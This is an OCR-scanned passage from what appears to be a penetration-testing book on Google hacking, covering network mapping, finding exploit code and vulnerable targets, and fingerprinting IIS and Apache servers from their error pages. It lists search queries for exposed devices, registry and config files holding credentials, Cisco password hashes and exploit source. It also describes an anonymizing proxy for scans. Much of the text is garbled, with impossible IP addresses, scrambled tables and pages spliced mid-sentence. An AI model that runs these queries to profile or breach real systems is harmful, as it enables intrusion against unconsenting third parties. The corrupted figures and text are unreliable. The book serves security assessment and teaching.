8.3.33.0/24 12.107.4.0/23 12.107.6.0/24 12.120.242.0/24 13.1^4.340.0/23 12.164.244.0/23 12 . Iti4. 246 .0/24 13 . 164. 347 .0/34 61.90.180.0/23 61.92.0.0/16 From 62.40.103.69 62.40.103.69 62.40.103.69 62.40.10S.69 62.40.103.69 62.40.103.69 62.40.103.69 62.40.103.69 62.40.103.69 62 .40 . 103.69 Flaps Duration Reuse Path 00! 33! 57 00:06:39 00:06:29 00:00:42 00:06:39 00:06:29 00:06:29 00:33:57 00 : 11:49 00:07:36 20965 3549 14757 14757 1 3096s 3549 14757 20965 3549 14757 20965 1299 701 7018 7018 30965 3549 14757 20965 3549 14757 20965 3549 14757 30965 3549 14757 14757 1 30965 1299 701 7018 3786 20965 1299 1239 9269 The ntop program shown network traffic statistics that can be used to deter- mine the network architecture of a target. The query intitle: "Welcome to ntop!" will locate servers that have publicized their ntop programs, which pro- duces the output shown in Figure 5.16. www.syngress.com 174 Chapter 5 • Network Mapping Figure 5.16 NTOP Output Reveals Network Statistics ^^^^^^^^^K Welcome to ^ - 1 1 C P0http://prlmata.lsamplec.br:3OOO/ - Q' mtltle:"Welcome to ntopr Welcome Remote to Local IP Traffic 1 to 1 Hoist Name 1 IP Address || Data Received ntop! [*10.0.0.85* 10.0.0.85 Oj 0.0 % L*12.129.11.49* 1 12.129.11 .49|| o| 0.0 % 1*128.117.149.64* 1 128.1 17. 149.S4|| o| 0.0 % ^ About ntop > Data Rcvd 1*128.242.237.107* 128.242.237. 10J7| 0 0.0% ^128.242.244.242* 128.242.244.242 0 0.0% ^ Data Sent ^ Stats ^ IP Traffic ^128.63.2.53* 128.63.2.53 0 0.0% 1*128.8.18.90* 128.8.10.90 0 0.0% 9 B->L 9 L->B 9 L<->L *128.9 .0.107* 128.9.0.107 0 0.0% ^128.95.45.227* 128.95.45.227 0 0.0% o Matrix o Local U&aae *130J36.212.50* 130.236.212.5O| 0 0.0% > IP Protocols [*133.205.190.92* 133.205. 190.92| 0 0.0% ©1998-99 by [*134.134.9.214* 134.134.9.214| 0 0.0% 1*134.208^8.169* 134.208.38. 169| 0 0.0% Ljca Deri L*137.229 .58.10* 137.229.58. 10| 0 0.0% 1*140.109.251.189* [140.109.251. 189| 0 OjO% r 5 < K 1 /, Practically any Web-based network statistics package can be located with Google. Table 5.1 reveals several examples from the Google Hacking Database that show searches for various network documentation. Table 5.1 Examples of Network Documentation from the GHDB Query Device/Report intitle:"statistics of" "advanced awstats shows statistics for Web servers. web statistics" intitle:"Big Sister" +"0K Big Sister program reveals network Attention Trouble" information. inurl:"cacti" -i-inurl:"graph_ cacti reveals internal network info view.php" -i-"Settings Tree including architecture, hosts, and View" -CVS -RPM services. inurl:fcgi-bin/echo fastcgi echo program reveals detailed server information. "These statistics were produced Getstats program reveals server statistical by getstats" information. Continued www. syngress.com Network Mapping • Chapters 175 Table 5.1 Examples of Network Documentation from the GHDB Query Device/Report inurh'Vcricket/grapher.cgi" intitle:"Object not found" netware "apache 1 .." ((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph")) "Looking Glass" (inurl:"lg/" | inurhlookingglass) filetype:reg "Terminal Server Client" intext:"Tobias Oetiker" "traffic analysis" intitle:"Welcome to ntop!" inurl:"smb.conf" intext: "workgroup" filetype:conf intitle:"Ganglia" "Cluster Report for" intitle:"System Statistics" "System and Network Information Center" intitle:"ADSL Configuration page" "cacheserverreport for" "This analysis was produced by calamaris" inurhvbstats.php "page generated" filetype:vsd vsd network -samples -examples grapher.cgi reveals networks information like configuration, services, and band- width. Microsoft Terminal Services connection settings Registry files reveal credentials and configuration data. MRTG analysis pages reveals various network statistical information. ntop program shows current network usage. Samba config file reveals server and network data. vbstats report reveals server statistical information. Visio network drawings. Server Cluster Reports SNIC reveals internal network information including network configuration, ping times, services, and host information. SolWise ADSL Modem Network Stats. Squid Cache Server Reports. HP Switch Web Interface. ifGraph SNMP data collector. Looking Glass network stats output. This type of information is a huge asset during a security audit, which can save a lot of time, but realize that any information found in this manner should be validated before using it in any type of finished report. www. syngress.com Chapter 5 • Network Mapping Summary Network data can be obtained in a variety of ways, but Google can play an important role during the information-gathering phase of a network assessment. By starting with generic information and applying a basic methodology, the details of a network begin to piece together, from the simple determination of domain names used by the target down to specific details about machines on the network. No piece of data should be overlooked during an assessment, especially when dealing with a weU-secured target. Domain names can be acquired by using simple site queries combined with a bit of page scraping, or by more advanced tools Hke the BiLE toolkit written by SensePost. Google can be used to locate or augment Web-based networking tools like NQT, which enables remote execution of various network-querying applications. Using creative queries, Google may even locate Web-enabled network devices in use by the target or output from network statistical packages. Whatever your goal during a network- based assessment, there's a good chance Google can be used to augment your existing tools and techniques. Solutions Fast Track Mapping Methodology 0 Simple yet effective, the basic methodology presented in this chapter describes the process required to advance your insight into a target's Internet presence. Mapping Techniques 0 Domain names can be determined through the use of the site operator. Page scraping techniques can be used to extract domain names from Google results pages. 0 Link Mapping is a fairly complex process that determines nonobvious relationships between sites. The BiLE toolkit from SensePost makes quick work out of this fairly complex technique. 0 Group Tracing can turn simple author searches into detailed information about a network and its users. www. syngress.com Network Mapping • Chapter 5 0 Non-Google Web Utilities can be located and enhanced with creative use of Google. We examined the NQT tool, converting it into an anonymized rotator that bounces commands off of remote servers before communicating with the target. Targeting Web-Enabled Network Devices 0 Web-enabled network devices can be located with simple Google queries. 0 The information from these devices can be used to help build a network map. Locating Various Network Reports 0 Network statistic reports can be located with simple Google queries. 0 The information from these reports can be used to help build a network map. Links to Sites www.sensepost.com: Home of the BiLE and BiLE-weigh utilities. www. syngress.com Chapter 5 • Network Mapping Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Q: The NQT tool can only scan one port at a time. Could this behavior be modified? A: Without modifying the code on the remote NQT server, this task w^ould require the coding of a PHP loop that feeds the requests one at a time to the NQT server. Remember, though, that even single ports can play a critical role when it comes time to perform an actual network port scan. For many different types of scans, it's always advantageous to have a list of ports that are known to be open. Ql Aren't there any Web-based tools besides NQT with a larger port scan range? 1 — 1 A: If you're interested ii ^cannj ng lots of ports, you might be better off with a standard scanner like nmap. However, to flex those Google muscles, try a query like inurhportscan.php ("from Port" | "Port Range") suggested by Jimmy Neutron on the Gr^ gle . H a rki n g Forums. Although there aren't are often excessive when you consider that the san^task could be more securely accompHshed via serial port connection or^^a dedicated admin network connection. Second, small devices require small servers, so some exotic Web servers are used that are not as well tested as Apache, for example (consider the vulnerabilities on Axis cams at security focus) . Third, as we've seen in this chapter, the pages can be found with (or submitted to) Google if the admins are not careful. This opens the floodgates for all the fledgling Google hackers out there. ;w reasons. First, they Network Mapping • Chapter 5 Q: Our network devices (routers) can't be accessed by anyone from outside; does that mean we are safe? A: Even though it is not accessible from the WAN, it may be accessible from a compromised host on your LAN. Posting information about it on usenet or tech forums is a risk. For an example, try searching for intext: "enable secret 5 $" as suggested by hevnsnt on the Google Hacking Forums. Then try the same on Google Groups. It's a good thing Cisco implemented strong encryption on those passwords, since these searches often reveal sensitive information about these devices. www. syngress.com Chapter 6 1 Locating Exploits and Finding Targets Solutions in this Chapter i Locating Exploit Code Locating Vulnerable Links to Sites Frequently Asked Questions B Summary El Solutions Fast^rack 0 Frequently Asked Questions 181 182 Chapter 6 • Locating Exploits and Finding Targets Introduction Exploit code, collectively called exploits, is a tool of the hacker trade. Designed to penetrate a target, most hackers have many different exploits at their disposal. Some exploits, termed zero day or Oday, remain underground for some period of time, eventually becoming public, posted to newsgroups or Web sites for the world to share. With so many Web sites dedicated to the distribution of exploit code, it's fairly simple to harness the power of Google to locate these tools. It can be a slightly more difficult exercise to locate potential targets, even though many modern Web application security advisories include a Google search designed to locate potential targets. In this chapter we explore methods locating exploit code and potentially vul- nerable targets. These are not strictly "dark side" exercises, since security profes- sionals often use public exploit code during a vulnerability assessment. However, only black hats use those tools against systems without prior consent. Locating Exploit Code Untold hundreds and thousands of Web sites are dedicated to providing exploits to the general public. Black hats generally provide exploits to aid fellow black hats in the hacking community. White hats provide exploits as a way of elimi- nating false positives from automated tools during an assessment. Simple searches such as remote exploit and vulnerable exploit locate exploit sites by focusing on common Ungo used by the security community. Other searches, such as inurhOday, don't work nearly as well as they used to, but old standbys like inurhsploits still work fairly well. The problem is that most security folks don't just troU the Internet looking for exploit caches; most frequent a handful of sites for the more mainstream tools, venturing to a search engine only when their book- marked sites fail them. When it comes time to troU the Web for a specific secu- rity tool, Google's a great place to turn first. Locating Public Exploit Sites One way to locate exploit code is to focus on the file extension of the source code and then search for specific content within that code. Since source code is the text-based representation of the difFicult-to-read machine code, Google is well suited for this task. For example, a large number of exploits are written in C, which generally uses source code ending in a .c extension. Of course, a search www. syngress.com Locating Exploits and Finding Targets • Chapter 6 183 (or filetypex c returns nearly 500,000 results, meaning that we need to narrow our search. A query (or filetypex exploit returns around 5,000 results, most of which are exactly the types of programs we're looking for. Bearing in mind that these are the most popular sites hosting C source code containing the word exploit, the returned list is a good start for a list of bookmarks. Using page-scraping tech- niques, we can isolate these sites by running a UNIX command such as: grep Cached exp | awk -F" -" '{print $1}' | sort -u against the dumped Google results page. Using good, old-fashioned cut and paste or a command such as lynx —dump works well for capturing the page this way. The slightly polished results of scraping 20 results from Google in this way are shown in Table 6.1. Table 6.1 Most Common Hits for the Query filetypeic exploit Site packetstorm.linuxsecurity.com synnergy.net unsecure.altervista.org www.blacl within the source code. A query such as "#include " exploit would locate C source code that contained the word exploit, regardless of the file's extension. This would catch code (and code fragments) that are displayed in HTML documents. Extending the search to include programs that include a friendly usage statement with a query such as "#include " usage exploit returns the results shown in Figure 6.1. www. syngress.com Locating Exploits and Finding Targets • Chapter 6 185 Figure 6.1 Searching for Exploit Code with Nonstandard Extensions Coogle Search: 'Vinclude " "Usage" exploit I [ C ] |Gllittp7/www.goo9le.i:om/searcli^hl=en&lr ' Q- | Google Web Imaoes Groups News Froooie mom » "#inc!Lide " "Usage" exploit f '. , Advaroad Seamh Web Results 1 - 10 of about 14,200 for '^ includ6 < stdio.h >" " Usage " exploit . (0.24 seconds) Paging nueva 1 ... Compile: #gcc -o kazaa-xploit kazaa-exploit.c ' Usage: #./kazaa-xploit ... include ^nettib.h^ #include #include ■isys/socket.h^ ^include #include ;it(Hrr); } void usageQ { printf( "INN version 1.[45].x explait by Method ... cleoz.armorik.netJcleo/cleo.Je-innd.html - 12k - .. - - ..-■imilar pages 1 Hacked by CLEO 1 Exptort : Samba SWAT Login ... include #inclutie -inetdb.h^ ffin-clude ■istdlib.h> ffirclude Sinclude ... Unknown result: %sVi^'j buf); exit[1); }}void usage(void) <[ printf ... cleoz.armorik.neycleo/cleo/e-samba^5wat.html - 13k - Cached - Similar pages [ More r&sults from cl&oz.armorlk.nel ] K-Otlk Security : Stack overflow exploit code generator fQx333xe5. ... ... bin) II (lien) || [(env) && (w))) usage(argiv[0 ... Error in creating %s^n". EXPLOIT); fprintf (fd ... setting header "I fprintf (fd, "\n#include *.nfflnclude ... www.k-otik.com/exploits/CM-.1S_Cix3jSxes.c_php - 2[,*k - - .(^s to 'http://www.googk.com/advariEeif_5earch?q=5a2^23...tdio.li^3Ea?2+K2iUsag-e?i2Z4-^^ This search returns quite a few hits, nearly all of which contain exploit code. Using traversal techniques (or simply hitting up the main page of the site) can reveal other exploits or tools. Notice that most of these hits are HTML docu- ments, which our previous ^/i/etype.x query would have excluded. There are lots of ways to locate source code using common code strings, but not aU source code can be fit into a nice, neat little box. Some code can be nailed down fairly neatly using this technique; other code might require a bit more query tweaking. Table 6.2 shows some suggestions for locating source code with common strings. Table 6.2 Locating Source Code with Common Strings Extension Language (Optional) Sample String asp.net (C#) Aspx "<%@ Page Language="C#"" inherits asp.net (VB) Aspx "<%@ Page Language="vb"" inlierits asp.net (VB) Aspx <%@ Page LANGUAGE="JScript" C C "#include " C# Cs "using System; " class C+ + Cpp "#indude "stdafx.h"" Java J, JAV class public static JavaScript JS " 79 . 80. home page, and then look for links to the information you want. 81. 82.
  • Click the 83. 84. Back button to try another link.
  • 85. 86. 87.

    HTTP 400 - Bad Request
    88. Internet Information Services

    The phrase "Please try the following" in line 65 exists in every single error file in this directory, making it a perfect candidate for part of a good base search. This line could effectively be reduced to "please * * following". Line 88 shows another phrase that appears in every error document; "Internet Information Services". These are "golden terms" to use to search for IIS HTTP/ 1.1 error pages that Google has crawled. A query such as intitle:"Tlie page cannot be found" "please following" "Internet * Services" can be used to search for IIS servers that present a 400 error page, as shown in Figure 8.3. www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 227 Figure 8.3 Smart Search for Locating IIS Servers f3 O The page cannot be fojnd I M - I |C|http://216.239.4L104/search?q= -'"Q- Google The page cannot be found The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. Please try the following: + Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly, * If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted, * Click the Back button to try another link. HTTP Errsr^-O'^- - File or dirKtorv nst found, Internet Infformati'DH Services {'.IS,] Technical Information ffor support personnel) * Go to Microsoft Product Support Services and perform a title search for the words HTTP and 404. * Open IIS Help, which is accessible in IIS Manager (inetmgr), and search for topics titled Web Site Setup, Common Administrative Tasks, and About Custom Error Messages. (D Looking at this cached page carefuUy, you'U notice that the actual error code itself is printed on the page, about halfway down. This error line is also printed on each of IIS's error pages, making for another good limiter for our searching. The line on the page begins with "HTTP Error 404," which might seem out of place, considering we were searching for a 400 error code, not a 404 error code. This occurs because several IIS error pages produce similar pages. Although com- monalities are often good for Google searching, they could lead to some confu- sion and produce ineffective results if we are searching for a specific, less benign error page. It's obvious that we'll need to sort out exactly what's what in these error page files. Table 8.1 lists all the unique HTML error page titles and error codes from a default IIS 5 installation. Table 8.1 IIS HTTP/1 .1 Error Page Titles Error Code Page Title 400 The page cannot be found 401.1, 401.2, 401.3, 401.4, You are not authorized to view this page 401.5 403.1, 403.2 403.3 403.4 The page cannot be displayed The page cannot be saved The page must be viewed over a secure channel Continued 228 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Table 8.1 IIS HTTP/1.1 Error Page Titles Error Code Page Title 403.5 The page must be viewed with a high-security Web browser 403.6 You are not authorized to view this page 403.7 The page requires a client certificate 403.8 You are not authorized to view this page 403.9 The page cannot be displayed 403.10, 403.11 You are not authorized to view this page 403.12, 403.13 The page requires a valid client certificate 403.15 The page cannot be displayed 403.16, 403.17 The page requires a valid client certificate 404 1 404h Thp \A/ph ^itp cAnncii hp fniinH Thp n;5np /";^nrmt hp rlicnl;^\/pH 406 The resource cannot be displayed 407 Proxy authentication required 410 The page does not exist 412 The page cannot be displayed 414 The page cannot be displayed 500, 500.11, 500.12, The page cannot be displayed 500.13, 500.14, 500.15 502 The page cannot be displayed These page titles, used in an intitle search, combined with the other golden IIS error searches, make for very effective searches, locating all sorts of IIS servers that generate all sorts of telling error pages. To troU for IIS servers with the eso- teric 404.1 error pager, try a query such as intitle: "The Web site cannot be found" "please * * following". A more common error can be found with a query such as intitle: "The page cannot be displayed" "Internet Information Services" "please ** fol- lowing", which is very effective because this error page is shown for many dif- ferent error codes. In addition to displaying the default static HTTP/ 1.1 error pages, IIS can be configured to display custom error messages, configured via the Management Console. An example of this type of custom error page is shown in Figure 8.4. This type of functionality makes the job of the Google hacker a bit more difFi- www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 229 cult since there is no apparent way to home in on a customized error page. However, some error messages, including 400, 403.9, 411, 414, 500, 500.11, 500.14, 500.15, 501, 503, and 505 pages, cannot be customized. In terms of Google hacking, this means that there is no easy way an IIS 6 server can prevent displaying the static HTTP/ 1.1 error pages we so effectively found a minute ago. This opens the door for locating these servers through Google, even if the server has been configured to display custom error pages. Besides troUing through the IIS error pages looking for exact phrases, we can also perform more generic queries, such as intitle:" the page cannot be found" inetmgr, which focuses on the fairly unique term used to describe the IIS Management console, inetmgr, as shown near the bottom of Figure 8.3. Other ways to perform this same search might be intitle: "the page cannot be found" "internet information ser- vices", or intitle: "Under construction" "Internet Information Services". Other, more specific searches can reveal the exact version of the IIS server, such as a query for intext:"404 Object Not Found" Microsoft- IIS/ 5.0, as shown in Figure 8.4. Figure 8.4 "Object Not Found" Error Message Used to Find IIS 5.0 O O O NewB-Journal Online - Beach news 3B Jhttp://216.2^ - ifjtext:"404 Object Not Found" Microsoft-I IS/5.0 HTTP/ 1 . 1 404 Object Not Fou nd Server: M icro soft IIS/5 jO Date : Wed . 0 8 Sep 2004 1 2 :59 :5 8 GMT - X Powered By: ASP^^ET Content Type: text/htmJ J 404 Object Not Found HTTP/ 1,1 404 Object Not Found Serven MicrDsoft-HS/S J) Date: Wed, 08 Sep 2004 12:59:58 GMT X-PoweiEd-By: ASP JSET Content-Type: text/html 404 Object Not Found HTTP/1-1 404 Object Not Found Serven Micro soft .nS/5.0 Date: Wed. OS Sep 2004 12:59:58 GMT Display a menu ^ Apache Web Server Apache Web servers can also be located by focusing on server-generated error messages. Some generic searches such as "Apache /1. 3. 27 Server at" -intitle :index. of intitle:inf" or "Apache /1. 3. 27 Server at" -intitle: index. of intitle:error (shown in www. syngress.com 230 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Figure 8.5) can be used to locate servers that might be advertising their server version via an info or error message. Figure 8.5 A Generic Error Search Locates Apache Servers 0 Q 0 Google Search: "Apache" "Server at" - in title :index.of intitleLcrror M > ] [ C I |C|littp://www.' * '^Qj "Apache" "Server at" -intitle:index.of intitle Authentication Error ,,. More irforrr'iatior atout this oror may be available in tbe server error log. Apactia/1 .3.29 Servftraldigiib.dartrTJOLth.edL Port 60. iligllb.dartmouthi.edu/staflwBbi'Lsc/ ■ - Sep 23, 2004 - Cached ■ Similar pages 500 Internal Server Error ... More information about this error may be available in the server Brror log. ApachB/1 .3.27 Sflrvaratwww.arrTt.linux.org.uk Port ftO The ARM Linux maintainer ... WhW. arm. linux .org. ul(/geperal''cortactipg.s html - 6I< • Cached - Similar pages Embperl Error ... More information about this «rror may be available in the server error log. Apache- AdvancedExtranetSer^/eryi .3.27 Ssrver at www.adviceforinvestors.com Port 60. www.fin-info.comi' 5main5nobody,,1 621 5[)60SB.ce69B99b533i'mfbome.phtmi?page=mfhonie - 3k - Cached - Similar pages :3 A query such as "Apache/ 2. 0.40" intitle: "Object not found!" will locate Apache 2.0.40 Web servers that presented this error message. Figure 8.6 shows an error page irom an Apache 2.0.40 server shipped with Red Hat 9.0. Figure 8.6 A Common Error Message from Apache 2.0.40 O O O Object not found! Jj< ^ I fc^ 0http://lO,i;,lS,ZOl/l.h - Q' Object not found! The icqucsiod VEL was not found on this server. If you entered the URL manually please check your spelling and try again. If you think this is a server error, please contact the webmaster Error 404 10.12.18201 Fri 24 Sep 2004 I2MJ9AMEDT Apache/2 040 (Red Hat Linux) WWW. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 231 Although there might be nothing wrong with throwing queries around looking for commonaUties and good base searches, we've already seen in the IIS section that it's more effective to consult the server software itself for search clues. Most Apache installations rely on a configuration file called httpd.conf. Searching through Apache 2.0.40's httpd.conf file reveals the location of the HTML templates for error messages. The referenced files (which follow) are located in the Web root directory — such as /error/http_BAD_RE QUEST.html. var, which refers to the /var/ www/error directory on the file system: ErrorDocument 400 / error / HTTP_BAD_REQUEST . html . var ErrorDocument 401 / error /HTTP_UNAUTHORI ZED . html . var ErrorDocument 403 /error/HTTP_FORBIDDEN. html .var ErrorDocument 404 /err or/ HTTP_NOT_FOUND.html .var ErrorDocument 405 /err or/ HTTP_METHOD_NOT_ALLOWED.html .var ErrorDocument 408 /error /HTTP_REQUEST_TIME_OUT . html . var ErrorDocument 410 /error /HTTP_GONE . html . var ErrorDocument 411 /error/ HTTP_LENGTH_REQUIRED . html . var ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED . html . var ErrorDocument 413 /error /HTTP_REQUEST_ENTITY_TOO_LARGE . html . var ErrorDocument 414 /error /HTTP_REQUEST_URI_TOO_LARGE . html .var ErrorDocument 415 /error/HTTP_SERVICE_UNAVAILABLE . html . var ErrorDocument 500 /err or/ HTTP_INTERNAL_SERVER_ERROR.html .var ErrorDocument 501 /error /HTTP_NOT_IMPLEMENTED . html . var ErrorDocument 502 /error /HTTP_BAD_GATEWAY . html . var ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE . html . var ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES . html . var Taking a look at one of these template files, we can see recognizable HTML code and variable listings that show the construction of an error page. The file itself is divided into sections by language. The English portion of the HTTP_NOT_FOUND.html.var file is shown here: Content-language: en Content-type: text/html Body: en-- www.syngress.com 232 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware The requested URL was not found on this server. The link on the " >ref erring page seems to be wrong or outdated. Please inform the author of " >that page about the error. If you entered the URL manually please check your spelling and try again. en-- Notice that the sections of the error page are clearly labeled, making it easy to translate into Google queries. The TITLE variable, shown near the top of the Usting, indicates that the text "Object not found!" wiU be displayed in the browser's title bar. When this fde is processed and displayed in a Web browser, it wiU look like Figure 8.2. However, Google hacking is not always this easy. A search for intitle:" Object not found!" is too generic, returning the results shown in Figure 8.7. www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 Figure 8.7 Error Message Text Is Not Enough for Profiling ^ ^3 O Coogle Search: intltle:"Object Not FoundT [ ^ 1^ ] [ C ] |G]http:/7www.goo9le. com/search " Or intitle:"Object Not Found!" Google W*b Images Groups News Froogle more > intitle:'ObJed: Not FoundT (~ r> AdvanM-d Search Web Results 1 - 1 D of about 4,280 for intltle:"0bj«t Not Found!". (0.t3 seconds) 1 ob j ecl not found - wwftv.renewal.org.au/object^ - 3k - Cached - Similar paoes :: ob j ect not found | | found postcards :: found photos, found postcards, found writing, various found stuff. gallery one i: miscellaheous :: This is a collection of photos ... iAww.rehewal.org.au/objecfphotos/ - 24k - Cached - Simiiar paoes [ More results from WAW.renewal.org.au 1 (—Ob j ect Not Found— I it was a clumsy, ungracious sun^nder, but it was a suTender. evolver.loud.org.auyDbject' - 2k - Cached - Similar pages 404 Object Not Found - What remains of media art? w^ww.4[)4project.het'index e.html - Sk - Cached - Similar paoes These results are not what we're looking for. To narrow our results, we need a better base search. Constructing our base search from the template files included with the Apache 2.0 source code not only enables us to locate aU the potential error messages the server is capable of producing, it also shows us how those messages are translated into other languages, resulting in very soUd multilingual base searches. The HTTP_NOT_FOUND.html.var file listed previously references two vir- tual include lines, one near the top {include /top.htmf) and one near the bottom {include /bottom. html). These lines instruct Apache to read and insert the contents of these two files (located in our case in the /var/ www/error/include directory) into the current file. The following code lists the contents of the bottom.html fUe and show some subtleties that will help construct that perfect base search: < / ddx / dl xdl >

    Error


    234 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware < ! --#echo encoding= "none " var="DATE_LOCAL" -->
    < ! --#echo encoding= "none " var= " SERVER_SOFTWARE" -->
    First, notice line 4, which will display the word "Error" on the page. Although this might seem very generic, it's an important subtlety that would keep results like the ones in Figure 8.7 from displaying. Line 2 shows that another file (/var/www/error/contact.html.var) is read and included into this file. The contents of this file, listed as foUows, contain more details we can include into our base search: 1. Content-language: en 2. Content-type: text/html 3 . Body: en-- 4. If you think this Is a server error, please contact 5. the webmaster 6. en-- This file, like the file that started this whole "include chain," is broken up into sections by language. The portion of this file listed here shows yet another unique string we can use. We 'U select a fairly unique piece of this line, "think this is a server error," as a portion of our base search instead of just the word error, which we used initially to remove some false positives. The other part of our base search, intitle: "Object not found!", was originally found in the /error/http_BAD_REQUEST.html.var file. The final base search for this file then becomes intitle: "Object Not Found!" "think this is a server error", which returns very accurate results, as shown in Figure 8.8. www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 Figure 8.8 A Good Base Search Evolved O O O Google Search: intitle; "Object Not Found 1" "think this is a server error* \< >\\c \ [G]http://tvww.google.com/seartl' " intitle:"Object Not Found!" "think this is a server error" Web Imaoes GrouDS News Frooale more » Gougle — c^..,_ T 1 1 Web Faults 1 - 10 of about 3,030 for intitle:"Object Not FoundT Ihink this is a server error". (0.53 seconds) 1^ Object not found! Object not found! The requested URL was not found on this server_ ... If you think this is a server error, please contact the webmaster Eror 4134. ... Whftw.lvc-hoche-versailles. ac-versailles.fr/ -saadadyDQuiLter.html -2k - Cached - Similar oaoes Object not found! ... Object not found! The requested URL was not found on this server. ... If you think this is a server error, please contact the webmaster En'or 454. ... search. goforit.com/default?catid=119S&72St cached=www_comitau_orgi^Fueddanusarduitalianu.htm - 3k - Cached - Similar paoes Oblect not found! Object not found! The requested URL (/abe) was not found on this server. ... If you think this is a server error, please contact the webmaster Eror 404. ... ims.w.clyabe - 2k - Cached - Similar papes T Now that we've found a good base search for one error page, we can auto- mate the query-hunting process to determine good base searches for the other error pages referenced in the httpd.conf file, helping us create solid base searches for each and every default Apache (2.0) error page. The contact. html.var file that we saw previously is included in each and every Apache 2.0 error page via the bottom.html file. This means that "think this is a server error" wiU work for aU the different error pages Apache 2.0 wiU produce. The other critical element to our search was the in title search, which we could ^rep for in each of the error fdes. While we're at it, we should also try to grab a snippet of the text that is printed in each of the error pages, remembering that in some cases a more specific search might be needed. Using some basic shell commands, we can isolate both the title of an error page and the text that might appear on the error page: grep -h -r "Content-language: en" -A 10 | grep -A5 "TITLE" | grep -v virtual This Linux bash shell command, when run against the Apache 2.0 source code tree, wiU produce output similar to that shown in Table 8.2. This table lists the title of each English Apache (2.0 and newer) error page as well as a portion of the text that wiU be located on the page. Instead of searching for English mes- sages only, we could search for errors in other Apache-supported languages by simply replacing the Content-language string in the previous grep command from en to either de, es,fr, or sv, for German, Spanish, French, or Swedish, respectively. 236 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Table 8.2 The Title and Partial Text of English Apache 2.0 Error Pages Error Page Title Error Page Partial Text Bad gateway! Bad request! Access forbidden! Resource is no longer available! Server error! Method not allowed! No acceptable object found! Object not found! Cannot process request! Precondition failed! Request entity too large! Request time-out! Submitted URI too large! Service unavailable! Authentication required! The proxy server received an invalid response from an upstream server. Your browser (or proxy) sent a request that this server could not understand. You don't have permission to access the requested directory. Either there is no index doc- ument or the directory is read-protected. The requested URL is no longer available on this server and there is no forwarding address. The server encountered an internal error and was unable to complete your request. A request with the method is not allowed for the requested URL. An appropriate representation of the requested resource could not be found on this server. The requested URL was not found on this server. The server does not support the action requested by the browser. The precondition on the request for the URL failed positive evaluation. The method does not allow the data trans- mitted, or the data volume exceeds the capacity limit. The server closed the network connection because the browser didn't finish the request within the specified time. The length of the requested URL exceeds the capacity limit for this server. The request cannot be processed. The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later. This server could not verify that you are autho- rized to access the URL. You either supplied the wrong credentials (such as a bad password) or your browser doesn't understand how to supply the credentials required. Continued www.syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 237 Table 8.2 The Title and Partial Text of English Apache 2.0 Error Pages Error Page Title Error Page Partial Text Unsupported media type! The server does not support the media type transmitted in the request. Variant also varies! A variant for the requested entity is itself a negotiable resource. Access not possible. To use this table, simply supply the text in the Error Page Title column as an intitle search and a portion of the text column as an additional phrase in the search query. Since some of the text is lengthy, you might need to select a unique portion of the text or replace common words with the asterisk, which will reduce your search query to the 10-word limit imposed on Google queries. For example, a good query for the first Une of the table might be "response from * upstream server" intitle:"Bad Gateway!". Alternately, you could also rely on the "think this is a server error" phrase combined with a title search, such as "think this is a server error" intitle:"Bad Gateway!" ■ Different versions of Apache wiU display slightly diiierent error messages, but the process of locating and creating solid base searches irom software source code is something you should get comfortable with to stay ahead of the ever-changing software market. This technique can be expanded to find Apache servers in other languages by reviewing the rest of the contact. html. var file. The important strings from that file are listed in Table 8.3. Because these sentences and phrases are included in every Apache 2.0 error message, they should appear in the text of every error page that the Apache server produces, making them ideal for base searches. It is pos- sible (and fairly easy) to modify these error pages to provide a more polished appearance when a user encounters an error, but remember: Hackers have dif- ferent motivations. Some are simply interested in locating particular versions of a server, perhaps to exploit. With that criteria, there is no shortage of servers on the Internet that are using these default error phrases. www. syngress.com 238 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Table 8.3 Phrases Located on All Default Apache (2.0.28-2.0.52) Error Pages 1 ^nnn^n^ LCI 1 1 M U a M ^ rill d 3^ J German Sofern Sie dies fur eine Fehlfunktion des Servers halten, informieren Sie bitte den hieruber. English If you think this is a server error, please contact. Spanish En caso de que usted crea que existe un error en el servidor. French Si vous pensez qu'il s'agit d'une erreur du serveur, veuillez contacter. Swedish Om du tror att detta beror pa ett serverfel, van- ligen kontakta. Besides Apache and IIS, other servers can be located by searching for server- produced error messages, but we're trying to keep this book just a bit thinner than your local yellow pages, so we'U draw the line at just these two servers. Application Software Error Messages The error messages we've looked at so far have all been generated by the Web server itself. In many cases, applications running on the Web server can generate errors that reveal information about the server as well. There are untold thou- sands of Web applications on the Internet, each of which can generate any number of error messages. Dedicated Web assessment tools such as SPI Dynamic's Weblnspect excel at performing detailed Web application assessments, making it seem a bit pointless to troU Google for application error messages. However, we search for error message output throughout this book simply because the data contained in error messages should not be overlooked. We've looked at various error messages in previous chapters, and we'U see more error messages in later chapters, but let's take a quick look at how error messages can help profile a Web server and its applications. Admittedly, we will hardly scratch the surface of this topic, but we'll make an eifort to stimulate your thinking about Google's ability to locate these sometimes very telling error messages. One query, "Fatal error: Call to undefined function" -reply -the —next, wiU locate Active Server Page (ASP) error messages. These messages often reveal informa- tion about the database software in 